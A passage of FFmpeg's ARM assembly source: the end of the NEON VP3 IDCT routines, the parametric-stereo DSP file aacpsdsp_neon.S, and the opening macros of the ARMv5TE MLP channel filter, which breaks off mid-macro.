vld1.64 {d0-d1}, [r3,:128] @ d0/d1 = C1..C7 for the xCnSm aliases
vld1.64 {d16-d19}, [r2,:128] @ rows 0-1
vst1.64 {q4-q5}, [r2,:128]! @ clear as we load
vld1.64 {d20-d23}, [r2,:128] @ rows 2-3
vst1.64 {q4-q5}, [r2,:128]!
vld1.64 {d24-d27}, [r2,:128] @ rows 4-5
vst1.64 {q4-q5}, [r2,:128]!
vadd.s16 q1, q8, q12 @ ip[0] + ip[4]
vsub.s16 q8, q8, q12 @ ip[0] - ip[4]
vld1.64 {d28-d31}, [r2,:128] @ rows 6-7
vst1.64 {q4-q5}, [r2,:128]!
@ One 1-D pass of the VP3 IDCT on q8-q15 (shared by rows and columns).
vp3_idct_core_neon:
vmull.s16 q2, d18, xC1S7 // (ip[1] * C1) << 16
vmull.s16 q3, d19, xC1S7
vmull.s16 q4, d2, xC4S4 // ((ip[0] + ip[4]) * C4) << 16
vmull.s16 q5, d3, xC4S4
vmull.s16 q6, d16, xC4S4 // ((ip[0] - ip[4]) * C4) << 16
vmull.s16 q7, d17, xC4S4
vshrn.s32 d4, q2, #16
vshrn.s32 d5, q3, #16
vshrn.s32 d6, q4, #16
vshrn.s32 d7, q5, #16
vshrn.s32 d8, q6, #16
vshrn.s32 d9, q7, #16
vadd.s16 q12, q1, q3 // E = (ip[0] + ip[4]) * C4
vadd.s16 q8, q8, q4 // F = (ip[0] - ip[4]) * C4
vadd.s16 q1, q2, q9 // ip[1] * C1
vmull.s16 q2, d30, xC1S7 // (ip[7] * C1) << 16
vmull.s16 q3, d31, xC1S7
vmull.s16 q4, d30, xC7S1 // (ip[7] * C7) << 16
vmull.s16 q5, d31, xC7S1
vmull.s16 q6, d18, xC7S1 // (ip[1] * C7) << 16
vmull.s16 q7, d19, xC7S1
vshrn.s32 d4, q2, #16
vshrn.s32 d5, q3, #16
vshrn.s32 d6, q4, #16 // ip[7] * C7
vshrn.s32 d7, q5, #16
vshrn.s32 d8, q6, #16 // ip[1] * C7
vshrn.s32 d9, q7, #16
vadd.s16 q2, q2, q15 // ip[7] * C1
vadd.s16 q9, q1, q3 // A = ip[1] * C1 + ip[7] * C7
vsub.s16 q15, q4, q2 // B = ip[1] * C7 - ip[7] * C1
vmull.s16 q2, d22, xC5S3 // (ip[3] * C5) << 16
vmull.s16 q3, d23, xC5S3
vmull.s16 q4, d22, xC3S5 // (ip[3] * C3) << 16
vmull.s16 q5, d23, xC3S5
vmull.s16 q6, d26, xC5S3 // (ip[5] * C5) << 16
vmull.s16 q7, d27, xC5S3
vshrn.s32 d4, q2, #16
vshrn.s32 d5, q3, #16
vshrn.s32 d6, q4, #16
vshrn.s32 d7, q5, #16
vshrn.s32 d8, q6, #16
vshrn.s32 d9, q7, #16
vadd.s16 q3, q3, q11 // ip[3] * C3
vadd.s16 q4, q4, q13 // ip[5] * C5
vadd.s16 q1, q2, q11 // ip[3] * C5
vadd.s16 q11, q3, q4 // C = ip[3] * C3 + ip[5] * C5
vmull.s16 q2, d26, xC3S5 // (ip[5] * C3) << 16
vmull.s16 q3, d27, xC3S5
vmull.s16 q4, d20, xC2S6 // (ip[2] * C2) << 16
vmull.s16 q5, d21, xC2S6
vmull.s16 q6, d28, xC6S2 // (ip[6] * C6) << 16
vmull.s16 q7, d29, xC6S2
vshrn.s32 d4, q2, #16
vshrn.s32 d5, q3, #16
vshrn.s32 d6, q4, #16
vshrn.s32 d7, q5, #16
vshrn.s32 d8, q6, #16 // ip[6] * C6
vshrn.s32 d9, q7, #16
vadd.s16 q2, q2, q13 // ip[5] * C3
vadd.s16 q3, q3, q10 // ip[2] * C2
vsub.s16 q13, q2, q1 // D = ip[5] * C3 - ip[3] * C5
vsub.s16 q1, q9, q11 // (A - C)
vadd.s16 q11, q9, q11 // Cd = A + C
vsub.s16 q9, q15, q13 // (B - D)
vadd.s16 q13, q15, q13 // Dd = B + D
vadd.s16 q15, q3, q4 // G = ip[2] * C2 + ip[6] * C6
vmull.s16 q2, d2, xC4S4 // ((A - C) * C4) << 16
vmull.s16 q3, d3, xC4S4
vmull.s16 q4, d28, xC2S6 // (ip[6] * C2) << 16
vmull.s16 q5, d29, xC2S6
vmull.s16 q6, d20, xC6S2 // (ip[2] * C6) << 16
vmull.s16 q7, d21, xC6S2
vshrn.s32 d4, q2, #16
vshrn.s32 d5, q3, #16
vshrn.s32 d6, q4, #16
vshrn.s32 d7, q5, #16
vshrn.s32 d8, q6, #16 // ip[2] * C6
vmull.s16 q5, d18, xC4S4 // ((B - D) * C4) << 16
vmull.s16 q6, d19, xC4S4
vshrn.s32 d9, q7, #16
vadd.s16 q3, q3, q14 // ip[6] * C2
vadd.s16 q10, q1, q2 // Ad = (A - C) * C4
vsub.s16 q14, q4, q3 // H = ip[2] * C6 - ip[6] * C2
bx lr
endfunc
@ Final butterfly stage of one IDCT pass, leaving the eight output rows
@ in q8-q15.  The "col" variant first adds the bias passed in r3; the
@ "row" variant additionally transposes the 8x8 block and performs the
@ first butterfly of the following column pass (matching what
@ vp3_idct_start_neon did before the row pass).
.macro VP3_IDCT_END type
function vp3_idct_end_\type\()_neon
.ifc \type, col
vdup.16 q0, r3 @ r3 = rounding/bias value from the caller
vadd.s16 q12, q12, q0
vadd.s16 q8, q8, q0
.endif
vshrn.s32 d2, q5, #16 @ finish (B - D) * C4 from the core
vshrn.s32 d3, q6, #16
vadd.s16 q2, q12, q15 // Gd = E + G
vadd.s16 q9, q1, q9 // (B - D) * C4
vsub.s16 q12, q12, q15 // Ed = E - G
vsub.s16 q3, q8, q10 // Fd = F - Ad
vadd.s16 q10, q8, q10 // Add = F + Ad
vadd.s16 q4, q9, q14 // Hd = Bd + H
vsub.s16 q14, q9, q14 // Bdd = Bd - H
vadd.s16 q8, q2, q11 // [0] = Gd + Cd
vsub.s16 q15, q2, q11 // [7] = Gd - Cd
vadd.s16 q9, q10, q4 // [1] = Add + Hd
vsub.s16 q10, q10, q4 // [2] = Add - Hd
vadd.s16 q11, q12, q13 // [3] = Ed + Dd
vsub.s16 q12, q12, q13 // [4] = Ed - Dd
.ifc \type, row
vtrn.16 q8, q9
.endif
vadd.s16 q13, q3, q14 // [5] = Fd + Bdd
vsub.s16 q14, q3, q14 // [6] = Fd - Bdd
.ifc \type, row
// 8x8 transpose
vtrn.16 q10, q11
vtrn.16 q12, q13
vtrn.16 q14, q15
vtrn.32 q8, q10
vtrn.32 q9, q11
vtrn.32 q12, q14
vtrn.32 q13, q15
vswp d17, d24
vswp d19, d26
vadd.s16 q1, q8, q12 // start of the column pass: ip[0] + ip[4]
vswp d21, d28
vsub.s16 q8, q8, q12 // ip[0] - ip[4]
vswp d23, d30
.endif
bx lr
endfunc
.endm
@ Instantiate both pass finalizers.
VP3_IDCT_END row
VP3_IDCT_END col
@ Full 2-D VP3 IDCT, overwriting the destination.
@ r0 = dest, r1 = stride, r2 = coefficient block (cleared as a side effect).
@ Bias 8+2048: 8 is the rounding term for the final >>4, 2048 shifts the
@ signed result into unsigned pixel range for vqshrun.
function ff_vp3_idct_put_neon, export=1
mov ip, lr
bl vp3_idct_start_neon @ row pass
bl vp3_idct_end_row_neon
mov r3, #8
add r3, r3, #2048 // convert signed pixel to unsigned
bl vp3_idct_core_neon @ column pass
bl vp3_idct_end_col_neon
mov lr, ip
vpop {d8-d15}
vqshrun.s16 d0, q8, #4 @ descale and saturate each row to bytes
vqshrun.s16 d1, q9, #4
vqshrun.s16 d2, q10, #4
vqshrun.s16 d3, q11, #4
vst1.64 {d0}, [r0,:64], r1
vqshrun.s16 d4, q12, #4
vst1.64 {d1}, [r0,:64], r1
vqshrun.s16 d5, q13, #4
vst1.64 {d2}, [r0,:64], r1
vqshrun.s16 d6, q14, #4
vst1.64 {d3}, [r0,:64], r1
vqshrun.s16 d7, q15, #4
vst1.64 {d4}, [r0,:64], r1
vst1.64 {d5}, [r0,:64], r1
vst1.64 {d6}, [r0,:64], r1
vst1.64 {d7}, [r0,:64], r1
bx lr
endfunc
@ Full 2-D VP3 IDCT, added to the existing destination pixels with
@ saturation.  r0 = dest, r1 = stride, r2 = coefficient block (cleared).
@ Bias is just the rounding 8 here (no unsigned conversion: results are
@ >>4 then widened-added to the loaded pixels before vqmovun clamps).
function ff_vp3_idct_add_neon, export=1
mov ip, lr
bl vp3_idct_start_neon @ row pass
bl vp3_idct_end_row_neon
mov r3, #8 @ rounding bias for the final >>4
bl vp3_idct_core_neon @ column pass
bl vp3_idct_end_col_neon
mov lr, ip
vpop {d8-d15}
mov r2, r0 @ r2 = store pointer, r0 keeps loading ahead
vld1.64 {d0}, [r0,:64], r1
vshr.s16 q8, q8, #4
vld1.64 {d1}, [r0,:64], r1
vshr.s16 q9, q9, #4
vld1.64 {d2}, [r0,:64], r1
vaddw.u8 q8, q8, d0 @ add dest row, widening to 16 bits
vld1.64 {d3}, [r0,:64], r1
vaddw.u8 q9, q9, d1
vld1.64 {d4}, [r0,:64], r1
vshr.s16 q10, q10, #4
vld1.64 {d5}, [r0,:64], r1
vshr.s16 q11, q11, #4
vld1.64 {d6}, [r0,:64], r1
vqmovun.s16 d0, q8 @ clamp back to [0,255]
vld1.64 {d7}, [r0,:64], r1
vqmovun.s16 d1, q9
vaddw.u8 q10, q10, d2
vaddw.u8 q11, q11, d3
vshr.s16 q12, q12, #4
vshr.s16 q13, q13, #4
vqmovun.s16 d2, q10
vqmovun.s16 d3, q11
vaddw.u8 q12, q12, d4
vaddw.u8 q13, q13, d5
vshr.s16 q14, q14, #4
vshr.s16 q15, q15, #4
vst1.64 {d0}, [r2,:64], r1
vqmovun.s16 d4, q12
vst1.64 {d1}, [r2,:64], r1
vqmovun.s16 d5, q13
vst1.64 {d2}, [r2,:64], r1
vaddw.u8 q14, q14, d6
vst1.64 {d3}, [r2,:64], r1
vaddw.u8 q15, q15, d7
vst1.64 {d4}, [r2,:64], r1
vqmovun.s16 d6, q14
vst1.64 {d5}, [r2,:64], r1
vqmovun.s16 d7, q15
vst1.64 {d6}, [r2,:64], r1
vst1.64 {d7}, [r2,:64], r1
bx lr
endfunc
@ DC-only IDCT + add: dc = (block[0] + 15) >> 5 is added to all 64
@ pixels with saturation; block[0] is cleared.
@ r0 = dest, r1 = stride, r2 = coefficient block.
function ff_vp3_idct_dc_add_neon, export=1
ldrsh r12, [r2] @ dc coefficient
mov r3, r0 @ r3 = store pointer
add r12, r12, #15 @ rounding for the >>5 below
vdup.16 q15, r12
mov r12, #0
strh r12, [r2] @ clear block[0]
vshr.s16 q15, q15, #5 @ q15 = broadcast dc value
vld1.8 {d0}, [r0,:64], r1
vld1.8 {d1}, [r0,:64], r1
vld1.8 {d2}, [r0,:64], r1
vaddw.u8 q8, q15, d0 @ dc + row, widened to 16 bits
vld1.8 {d3}, [r0,:64], r1
vaddw.u8 q9, q15, d1
vld1.8 {d4}, [r0,:64], r1
vaddw.u8 q10, q15, d2
vld1.8 {d5}, [r0,:64], r1
vaddw.u8 q11, q15, d3
vld1.8 {d6}, [r0,:64], r1
vaddw.u8 q12, q15, d4
vld1.8 {d7}, [r0,:64], r1
vaddw.u8 q13, q15, d5
vqmovun.s16 d0, q8 @ clamp back to [0,255]
vaddw.u8 q14, q15, d6
vqmovun.s16 d1, q9
vaddw.u8 q15, q15, d7
vqmovun.s16 d2, q10
vst1.8 {d0}, [r3,:64], r1
vqmovun.s16 d3, q11
vst1.8 {d1}, [r3,:64], r1
vqmovun.s16 d4, q12
vst1.8 {d2}, [r3,:64], r1
vqmovun.s16 d5, q13
vst1.8 {d3}, [r3,:64], r1
vqmovun.s16 d6, q14
vst1.8 {d4}, [r3,:64], r1
vqmovun.s16 d7, q15
vst1.8 {d5}, [r3,:64], r1
vst1.8 {d6}, [r3,:64], r1
vst1.8 {d7}, [r3,:64], r1
bx lr
endfunc
|
Akagi201/ffmpeg-xcode
| 9,927
|
ffmpeg-3.0.2/libavcodec/arm/aacpsdsp_neon.S
|
/*
* Copyright (c) 2012 Mans Rullgard
*
* This file is part of FFmpeg.
*
* FFmpeg is free software; you can redistribute it and/or
* modify it under the terms of the GNU Lesser General Public
* License as published by the Free Software Foundation; either
* version 2.1 of the License, or (at your option) any later version.
*
* FFmpeg is distributed in the hope that it will be useful,
* but WITHOUT ANY WARRANTY; without even the implied warranty of
* MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU
* Lesser General Public License for more details.
*
* You should have received a copy of the GNU Lesser General Public
* License along with FFmpeg; if not, write to the Free Software
* Foundation, Inc., 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301 USA
*/
#include "libavutil/arm/asm.S"
@ dst[i] += re^2 + im^2 for each complex input pair; 4 outputs per
@ iteration, software-pipelined (loads run one iteration ahead).
@ r0 = dst, r1 = complex src pairs, r2 = count (assumed multiple of 4).
function ff_ps_add_squares_neon, export=1
mov r3, r0 @ r3 = store pointer, r0 keeps loading ahead
sub r2, r2, #4 @ last 4 outputs handled after the loop
vld1.32 {q0}, [r1,:128]! @ prime the pipeline: first 4 pairs
vmul.f32 q0, q0, q0
vld1.32 {q2}, [r1,:128]!
vmul.f32 q2, q2, q2
vld1.32 {q1}, [r0,:128]!
1:
vpadd.f32 d6, d0, d1 @ pairwise add: re^2+im^2 per sample
vld1.32 {q0}, [r1,:128]!
vpadd.f32 d7, d4, d5
vmul.f32 q0, q0, q0
vld1.32 {q2}, [r1,:128]!
vadd.f32 q3, q1, q3 @ accumulate into dst
vld1.32 {q1}, [r0,:128]!
vmul.f32 q2, q2, q2
vst1.32 {q3}, [r3,:128]!
subs r2, r2, #4
bgt 1b
vpadd.f32 d6, d0, d1 @ drain the pipeline: final 4 outputs
vpadd.f32 d7, d4, d5
vadd.f32 q1, q1, q3
vst1.32 {q1}, [r3,:128]!
bx lr
endfunc
@ dst[i] = src0[i] * src1[i]: each complex pair from r1 scaled by one
@ real gain from r2; 4 pairs per iteration, pipelined.
@ r0 = dst pairs, r1 = src pairs, r2 = real gains, r3 = count.
@ The 2: path handles r1 being only 8-byte aligned (odd pair offset):
@ it keeps a one-pair carry in d0 and realigns the 16-byte loads.
function ff_ps_mul_pair_single_neon, export=1
sub r3, r3, #4 @ last 4 pairs handled after each loop
tst r1, #8 @ is src only 8-byte aligned?
bne 2f
vld1.32 {q0}, [r1,:128]! @ aligned path: prime with 2 pairs
1:
vld1.32 {q3}, [r2,:128]! @ 4 real gains
vmul.f32 d4, d0, d6[0] @ pair * gain (per-lane scalar multiply)
vmul.f32 d5, d1, d6[1]
vld1.32 {q1}, [r1,:128]!
vmul.f32 d6, d2, d7[0]
vmul.f32 d7, d3, d7[1]
vld1.32 {q0}, [r1,:128]!
vst1.32 {q2,q3}, [r0,:128]!
subs r3, r3, #4
bgt 1b
vld1.32 {q3}, [r2,:128]! @ drain: final 4 pairs
vmul.f32 d4, d0, d6[0]
vmul.f32 d5, d1, d6[1]
vld1.32 {q1}, [r1,:128]!
vmul.f32 d6, d2, d7[0]
vmul.f32 d7, d3, d7[1]
vst1.32 {q2,q3}, [r0,:128]!
bx lr
2:
vld1.32 {d0}, [r1,:64]! @ unaligned path: 1-pair carry in d0
vld1.32 {d1,d2}, [r1,:128]!
1:
vld1.32 {q3}, [r2,:128]!
vmul.f32 d4, d0, d6[0]
vmul.f32 d5, d1, d6[1]
vld1.32 {d0,d1}, [r1,:128]!
vmul.f32 d6, d2, d7[0]
vmul.f32 d7, d0, d7[1]
vmov d0, d1 @ rotate the carry pair forward
vld1.32 {d1,d2}, [r1,:128]!
vst1.32 {q2,q3}, [r0,:128]!
subs r3, r3, #4
bgt 1b
vld1.32 {q3}, [r2,:128]! @ drain: final 4 pairs
vmul.f32 d4, d0, d6[0]
vmul.f32 d5, d1, d6[1]
vld1.32 {d0}, [r1,:64]!
vmul.f32 d6, d2, d7[0]
vmul.f32 d7, d0, d7[1]
vst1.32 {q2,q3}, [r0,:128]!
bx lr
endfunc
@ Deinterleaves complex (re,im) input into two separate planes of the
@ output, 38*64 floats apart (real plane / imaginary plane); output is
@ written column-wise with a 64-float (256-byte) stride.
@ r0 = out base, r1 = interleaved in, r2 = starting column i, r3 = len.
@ Handles the first (partial) column with vst1 lane stores, then the
@ remaining columns 4 at a time (vst4) with a 2-at-a-time (vst2) cleanup
@ path at label 6: when the remaining count is not a multiple of 4.
function ff_ps_hybrid_synthesis_deint_neon, export=1
push {r4-r8,lr}
add r0, r0, r2, lsl #2 @ out += i floats
add r1, r1, r2, lsl #5+1+2 @ in += i * 32 complex pairs
rsb r2, r2, #64 @ columns remaining
mov r5, #64*4 @ output row stride in bytes
mov lr, r0 @ lr = real-plane column pointer
add r4, r0, #38*64*4 @ r4 = imaginary-plane column pointer
mov r12, r3
2:
@ first column: scatter re to lr, im to r4, two rows per load
vld1.32 {d0,d1}, [r1,:128]!
vst1.32 {d0[0]}, [lr,:32], r5
vst1.32 {d0[1]}, [r4,:32], r5
vst1.32 {d1[0]}, [lr,:32], r5
vst1.32 {d1[1]}, [r4,:32], r5
subs r12, r12, #2
bgt 2b
add r0, r0, #4 @ next output column
sub r2, r2, #1
tst r2, #2 @ odd pair of columns left? do them first
bne 6f
1:
@ main loop: 4 columns at a time, interleaved stores via vst4
mov lr, r0
add r4, r0, #38*64*4
add r6, r1, # 32*2*4 @ column 1 input
add r7, r1, #2*32*2*4 @ column 2 input
add r8, r1, #3*32*2*4 @ column 3 input
mov r12, r3
2:
vld1.32 {d0,d1}, [r1,:128]!
vld1.32 {d2,d3}, [r6,:128]!
vld1.32 {d4,d5}, [r7,:128]!
vld1.32 {d6,d7}, [r8,:128]!
vst4.32 {d0[0],d2[0],d4[0],d6[0]}, [lr,:128], r5
vst4.32 {d0[1],d2[1],d4[1],d6[1]}, [r4,:128], r5
vst4.32 {d1[0],d3[0],d5[0],d7[0]}, [lr,:128], r5
vst4.32 {d1[1],d3[1],d5[1],d7[1]}, [r4,:128], r5
subs r12, r12, #2
bgt 2b
add r0, r0, #16 @ 4 output columns consumed
add r1, r1, #3*32*2*4 @ skip the 3 extra input columns
subs r2, r2, #4
bgt 1b
pop {r4-r8,pc}
6:
@ cleanup: 2 columns at a time via vst2
mov lr, r0
add r4, r0, #38*64*4
add r6, r1, #32*2*4
mov r12, r3
2:
vld1.32 {d0,d1}, [r1,:128]!
vld1.32 {d2,d3}, [r6,:128]!
vst2.32 {d0[0],d2[0]}, [lr,:64], r5
vst2.32 {d0[1],d2[1]}, [r4,:64], r5
vst2.32 {d1[0],d3[0]}, [lr,:64], r5
vst2.32 {d1[1],d3[1]}, [r4,:64], r5
subs r12, r12, #2
bgt 2b
add r0, r0, #8
add r1, r1, #32*2*4
sub r2, r2, #2
b 1b
endfunc
@ Hybrid analysis filter: a 13-tap complex FIR evaluated per output.
@ r1 holds the 13 complex input taps (d19-d31, 26 floats); the code
@ exploits the filter symmetry by pre-forming sums/differences of
@ mirrored taps, then accumulates against the coefficients streamed
@ from r2.  r0 = out, r3 = output stride (complex), [sp] = n outputs.
@ The loop is pipelined: each iteration finishes output k while
@ starting the accumulation for output k+1.
function ff_ps_hybrid_analysis_neon, export=1
vldm r1, {d19-d31} @ 13 complex taps
ldr r12, [sp] @ n
lsl r3, r3, #3 @ stride in bytes (complex = 8 bytes)
vadd.f32 d16, d19, d31 @ mirrored tap sums / differences
vadd.f32 d17, d20, d30
vsub.f32 d18, d19, d31
vsub.f32 d19, d20, d30
vsub.f32 d0, d21, d29
vsub.f32 d1, d22, d28
vadd.f32 d2, d21, d29
vadd.f32 d3, d22, d28
vadd.f32 d20, d23, d27
vadd.f32 d21, d24, d26
vsub.f32 d22, d23, d27
vsub.f32 d23, d24, d26
vmov.i32 d6, #1<<31 @ sign-flip mask for one lane
vmov.i32 d7, #0
vmov.f32 q14, #0.0 @ accumulators
vmov.f32 q15, #0.0
vtrn.32 d6, d7
vrev64.32 q9, q9 @ swap re/im of the difference terms
vrev64.32 q0, q0
vrev64.32 q11, q11
veor q9, q9, q3 @ negate one lane (conjugate-style fixup)
veor q0, q0, q3
veor q11, q11, q3
vld1.32 {q13}, [r2,:128]! @ first coefficient block
vtrn.32 q8, q9
vtrn.32 q1, q0
vtrn.32 q10, q11
sub r12, r12, #1 @ last output drained after the loop
vmla.f32 q14, q8, q13
vld1.32 {q2}, [r2,:128]!
vmla.f32 q15, q9, q13
1:
vmla.f32 q14, q1, q2
vld1.32 {q13}, [r2,:128]!
vmla.f32 q15, q0, q2
vmla.f32 q14, q10, q13
vld1.32 {q2}, [r2,:128]!
vmla.f32 q15, q11, q13
vld1.32 {q13}, [r2,:128]!
vadd.f32 d6, d28, d29 @ horizontal reduction of both accumulators
vadd.f32 d7, d30, d31
vmov.f32 q14, #0.0 @ restart accumulators for the next output
vmov.f32 q15, #0.0
vmla.f32 q14, q8, q13
vpadd.f32 d6, d6, d7
vmla.f32 q15, q9, q13
vmla.f32 d6, d25, d4[0] @ centre tap contribution
vld1.32 {q2}, [r2,:128]!
vst1.32 {d6}, [r0,:64], r3 @ store one complex output
subs r12, r12, #1
bgt 1b
vmla.f32 q14, q1, q2 @ drain: final output
vld1.32 {q13}, [r2,:128]!
vmla.f32 q15, q0, q2
vmla.f32 q14, q10, q13
vld1.32 {q2}, [r2,:128]!
vmla.f32 q15, q11, q13
vadd.f32 d6, d28, d29
vadd.f32 d7, d30, d31
vpadd.f32 d6, d6, d7
vmla.f32 d6, d25, d4[0]
vst1.32 {d6}, [r0,:64], r3
bx lr
endfunc
@ Stereo interpolation: applies a 2x2 mixing matrix to the complex l/r
@ channels in place, with the matrix advancing by h_step every sample.
@ r0 = left pairs, r1 = right pairs, r2 = h (4 coeffs), r3 = h_step
@ (4 coeffs), [sp] = len.  Two samples per iteration: q1 holds the
@ matrix for sample k (h + step), q0 for sample k+1 (h + 2*step);
@ both advance by 2*step (q15) each pass.
function ff_ps_stereo_interpolate_neon, export=1
vld1.32 {q0}, [r2] @ h
vld1.32 {q14}, [r3] @ h_step
vadd.f32 q15, q14, q14 @ 2 * h_step
mov r2, r0 @ store pointers (r0/r1 load ahead)
mov r3, r1
ldr r12, [sp] @ len
vadd.f32 q1, q0, q14 @ matrix for the first sample
vadd.f32 q0, q0, q15 @ matrix for the second sample
vld1.32 {q2}, [r0,:64]! @ prime: first two l pairs
vld1.32 {q3}, [r1,:64]! @ and r pairs
subs r12, r12, #1
beq 2f @ single sample left: short path
1:
vmul.f32 d16, d4, d2[0] @ l' = h11*l + h21*r (both samples)
vmul.f32 d17, d5, d0[0]
vmul.f32 d18, d4, d2[1] @ r' = h12*l + h22*r
vmul.f32 d19, d5, d0[1]
vmla.f32 d16, d6, d3[0]
vmla.f32 d17, d7, d1[0]
vmla.f32 d18, d6, d3[1]
vmla.f32 d19, d7, d1[1]
vadd.f32 q1, q1, q15 @ advance both matrices by 2*step
vadd.f32 q0, q0, q15
vld1.32 {q2}, [r0,:64]!
vld1.32 {q3}, [r1,:64]!
vst1.32 {q8}, [r2,:64]!
vst1.32 {q9}, [r3,:64]!
subs r12, r12, #2
bgt 1b
it lt
bxlt lr @ even count: nothing left over
2:
vmul.f32 d16, d4, d2[0] @ final single sample
vmul.f32 d18, d4, d2[1]
vmla.f32 d16, d6, d3[0]
vmla.f32 d18, d6, d3[1]
vst1.32 {d16}, [r2,:64]!
vst1.32 {d18}, [r3,:64]!
bx lr
endfunc
|
Akagi201/ffmpeg-xcode
| 19,773
|
ffmpeg-3.0.2/libavcodec/arm/mlpdsp_armv5te.S
|
/*
* Copyright (c) 2014 RISC OS Open Ltd
* Author: Ben Avison <bavison@riscosopen.org>
*
* This file is part of FFmpeg.
*
* FFmpeg is free software; you can redistribute it and/or
* modify it under the terms of the GNU Lesser General Public
* License as published by the Free Software Foundation; either
* version 2.1 of the License, or (at your option) any later version.
*
* FFmpeg is distributed in the hope that it will be useful,
* but WITHOUT ANY WARRANTY; without even the implied warranty of
* MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU
* Lesser General Public License for more details.
*
* You should have received a copy of the GNU Lesser General Public
* License along with FFmpeg; if not, write to the Free Software
* Foundation, Inc., 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301 USA
*/
#include "libavutil/arm/asm.S"
#define MAX_CHANNELS 8
#define MAX_FIR_ORDER 8
#define MAX_IIR_ORDER 4
#define MAX_RATEFACTOR 4
#define MAX_BLOCKSIZE (40 * MAX_RATEFACTOR)
// Register aliases for ff_mlp_filter_channel_arm:
PST .req a1 // filter state pointer
PCO .req a2 // coefficient pointer
AC0 .req a3 // accumulator, low word
AC1 .req a4 // accumulator, high word
CO0 .req v1 // coefficient registers (rotating bank)
CO1 .req v2
CO2 .req v3
CO3 .req v4
ST0 .req v5 // state registers; also hold shift/mask args on entry
ST1 .req v6
ST2 .req sl
ST3 .req fp
I .req ip // blocksize loop counter
PSAMP .req lr // sample buffer pointer
// Emit one (or more, recursively) PIC jump-table entries:
// A = ARM mode, word displacements consumed by "ldr rX,[pc,...]; add pc";
// T = Thumb mode, halfword offsets for a tbh table.
.macro branch_pic_label first, remainder:vararg
A .word \first - 4
T .hword (\first) / 2
.ifnb \remainder
branch_pic_label \remainder
.endif
.endm
// Some macros that do loads/multiplies where the register number is determined
// from an assembly-time expression. Boy is GNU assembler's syntax ugly...
// load: ldr into register \group<index>, index evaluated via .altmacro %().
.macro load group, index, base, offset
.altmacro
load_ \group, %(\index), \base, \offset
.noaltmacro
.endm
.macro load_ group, index, base, offset
ldr \group\index, [\base, #\offset]
.endm
// loadd: ldrd of the register pair \group<index>/\group<index+1>.
.macro loadd group, index, base, offset
.altmacro
loadd_ \group, %(\index), %(\index+1), \base, \offset
.noaltmacro
.endm
.macro loadd_ group, index0, index1, base, offset
// ARM ldrd immediates only reach 255; fall back to two ldr beyond that
A .if \offset >= 256
A ldr \group\index0, [\base, #\offset]
A ldr \group\index1, [\base, #(\offset) + 4]
A .else
ldrd \group\index0, \group\index1, [\base, #\offset]
A .endif
.endm
// multiply: CO<i> * ST<i>, optionally accumulating; \long selects a
// 64-bit smull/smlal (used when the result must be shifted) vs mul/mla.
.macro multiply index, accumulate, long
.altmacro
multiply_ %(\index), \accumulate, \long
.noaltmacro
.endm
.macro multiply_ index, accumulate, long
.if \long
.if \accumulate
smlal AC0, AC1, CO\index, ST\index
.else
smull AC0, AC1, CO\index, ST\index
.endif
.else
.if \accumulate
mla AC0, CO\index, ST\index, AC0
.else
mul AC0, CO\index, ST\index
.endif
.endif
.endm
// A macro to update the load register number and load offsets
// (switching from the FIR region to the IIR region once the FIR taps
// are exhausted).
.macro inc howmany
.set LOAD_REG, (LOAD_REG + \howmany) & 3
.set OFFSET_CO, OFFSET_CO + 4 * \howmany
.set OFFSET_ST, OFFSET_ST + 4 * \howmany
.if FIR_REMAIN > 0
.set FIR_REMAIN, FIR_REMAIN - \howmany
.if FIR_REMAIN == 0
.set OFFSET_CO, 4 * MAX_FIR_ORDER
.set OFFSET_ST, 4 * (MAX_BLOCKSIZE + MAX_FIR_ORDER)
.endif
.elseif IIR_REMAIN > 0
.set IIR_REMAIN, IIR_REMAIN - \howmany
.endif
.endm
// Macro to implement the inner loop for one specific combination of parameters
// Inner-loop generator for one specific (mask==-1?, shift==0?, shift==8?,
// iir_taps, fir_taps) combination of the MLP channel filter.
// First allocates homes for SHIFT and MASK (reusing spare CO/AC/PCO
// registers where the tap count permits, else spilling to the stack),
// preloads all coefficients when they fit in CO0-CO3, then emits a
// software-pipelined loop that interleaves state/coefficient loads with
// the multiply-accumulate chain, applies the shift/mask and updates the
// state history and the sample buffer.
.macro implement_filter mask_minus1, shift_0, shift_8, iir_taps, fir_taps
.set TOTAL_TAPS, \iir_taps + \fir_taps
// Deal with register allocation...
.set DEFINED_SHIFT, 0
.set DEFINED_MASK, 0
.set SHUFFLE_SHIFT, 0
.set SHUFFLE_MASK, 0
.set SPILL_SHIFT, 0
.set SPILL_MASK, 0
.if TOTAL_TAPS == 0
// Little register pressure in this case - just keep MASK where it was
.if !\mask_minus1
MASK .req ST1
.set DEFINED_MASK, 1
.endif
.else
.if \shift_0
.if !\mask_minus1
// AC1 is unused with shift 0
MASK .req AC1
.set DEFINED_MASK, 1
.set SHUFFLE_MASK, 1
.endif
.elseif \shift_8
.if !\mask_minus1
.if TOTAL_TAPS <= 4
// All coefficients are preloaded (so pointer not needed)
MASK .req PCO
.set DEFINED_MASK, 1
.set SHUFFLE_MASK, 1
.else
.set SPILL_MASK, 1
.endif
.endif
.else // shift not 0 or 8
.if TOTAL_TAPS <= 3
// All coefficients are preloaded, and at least one CO register is unused
.if \fir_taps & 1
SHIFT .req CO0
.set DEFINED_SHIFT, 1
.set SHUFFLE_SHIFT, 1
.else
SHIFT .req CO3
.set DEFINED_SHIFT, 1
.set SHUFFLE_SHIFT, 1
.endif
.if !\mask_minus1
MASK .req PCO
.set DEFINED_MASK, 1
.set SHUFFLE_MASK, 1
.endif
.elseif TOTAL_TAPS == 4
// All coefficients are preloaded
SHIFT .req PCO
.set DEFINED_SHIFT, 1
.set SHUFFLE_SHIFT, 1
.if !\mask_minus1
.set SPILL_MASK, 1
.endif
.else
.set SPILL_SHIFT, 1
.if !\mask_minus1
.set SPILL_MASK, 1
.endif
.endif
.endif
.endif
// Spilled values are reloaded from the stack each iteration; the alias
// still needs a scratch register to land in (ST0/ST1).
.if SPILL_SHIFT
SHIFT .req ST0
.set DEFINED_SHIFT, 1
.endif
.if SPILL_MASK
MASK .req ST1
.set DEFINED_MASK, 1
.endif
// Preload coefficients if possible
.if TOTAL_TAPS <= 4
.set OFFSET_CO, 0
.if \fir_taps & 1
.set LOAD_REG, 1
.else
.set LOAD_REG, 0
.endif
.rept \fir_taps
load CO, LOAD_REG, PCO, OFFSET_CO
